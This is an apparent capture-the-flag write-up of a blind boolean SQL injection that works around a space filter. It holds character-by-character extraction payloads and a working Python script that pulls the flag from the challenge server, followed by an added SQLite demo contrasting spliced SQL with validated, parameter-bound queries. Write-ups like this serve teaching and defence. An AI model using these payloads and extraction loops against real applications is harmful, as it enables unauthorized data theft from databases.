Challenge link

Probing the `id` parameter shows that a filter is in place. The responses fall into five classes:

```text
id = 0               "Error Occured When Fetch Result."
id = 1               "Hello, glzjin wants a girlfriend."
id = 2               "Do you want to be my girlfriend?"
id = {filtered part} "SQL Injection Checked."
id = {anything else} "bool(false)"
```

Fuzzing shows that the space character is filtered, while most SQL functions are not.


Sending `0^1` returns the response for `id = 1`, so the parameter is used as a numeric value (a numeric injection) and an expression can be written directly in place of the number.

Sending `if(1,1,0)` likewise returns the `id = 1` response, so conditional expressions are evaluated too.

Each character of the flag can therefore be determined with `if((ascii(substr((select(flag)from(flag)),1,1))=78),1,0)`: when the condition is true the `id = 1` response comes back, otherwise the `id = 0` response. Parentheses replace the filtered spaces. (To go faster, replace the equals sign with a greater-than sign and use binary search.)

```python
import requests

# Candidate characters, ordered roughly by expected frequency so the common ones are tried first.
alpha = 'ufesridnophmabcgjklqtvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-'

url = 'http://node4.anna.nssctf.cn:28761'
flag = 'NSSCTF{'  # known prefix, so extraction starts at position 7

for i in range(7, 50):
    for j in alpha:
        # Boolean condition on a single character; parentheses stand in for the filtered spaces.
        data = f'if((ascii(substr((select(flag)from(flag)),{i},1))={ord(j)}),1,0)'

        res = requests.post(url=url, data={"id": data})

        # The id = 1 response ("Hello, ...") means the condition held for this character.
        if 'Hello' in res.text:
            flag += j
            print(flag)
            break
```
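The root cause is that the challenge splices the `id` value into the query text and then tries to block injection with a keyword filter, which is why removing spaces alone does not help. The following is an added illustration, not code from the challenge or from this write-up's author: a constructed SQLite table with the challenge's two messages, a lookup written the vulnerable way, and the hardened version that validates the type and binds the value as a parameter. SQLite has no `^` or `if()`, so the demo uses `|` and a bare comparison, which play the same role as the page's `0^1` and `if(cond,1,0)`; the table name `greet` and the function names are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table mirroring the two visible responses (not the challenge's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE greet (id INTEGER PRIMARY KEY, msg TEXT)")
    conn.executemany(
        "INSERT INTO greet VALUES (?, ?)",
        [
            (1, "Hello, glzjin wants a girlfriend."),
            (2, "Do you want to be my girlfriend?"),
        ],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str):
    """The pattern the challenge exhibits: the parameter becomes part of the SQL text.

    Any expression the database can evaluate is accepted, so a filter on spaces or
    keywords only constrains how the expression is written, not whether it runs.
    """
    row = conn.execute(f"SELECT msg FROM greet WHERE id={user_id}").fetchone()
    return row[0] if row else None


def hardened_lookup(conn: sqlite3.Connection, user_id: str):
    """Fix: validate the type first, then bind the value so it is data rather than SQL.

    A non-integer id is rejected outright instead of being searched for bad tokens,
    and the placeholder guarantees the bound value can never change the query's structure.
    """
    if not user_id.isdigit():
        return None
    row = conn.execute("SELECT msg FROM greet WHERE id=?", (int(user_id),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    # Expression inputs evaluate against the vulnerable lookup ...
    print("vulnerable, 0|1   ->", vulnerable_lookup(conn, "0|1"))
    print("vulnerable, (2>1) ->", vulnerable_lookup(conn, "(2>1)"))
    print("vulnerable, (2<1) ->", vulnerable_lookup(conn, "(2<1)"))
    # ... but are rejected before reaching the database in the hardened one.
    print("hardened,   0|1   ->", hardened_lookup(conn, "0|1"))
    print("hardened,   1     ->", hardened_lookup(conn, "1"))
```

The two vulnerable comparisons show the boolean oracle the write-up relies on: a true condition yields the `id = 1` row, a false one yields nothing. Against `hardened_lookup` the same inputs never produce a different row, so there is no signal to extract.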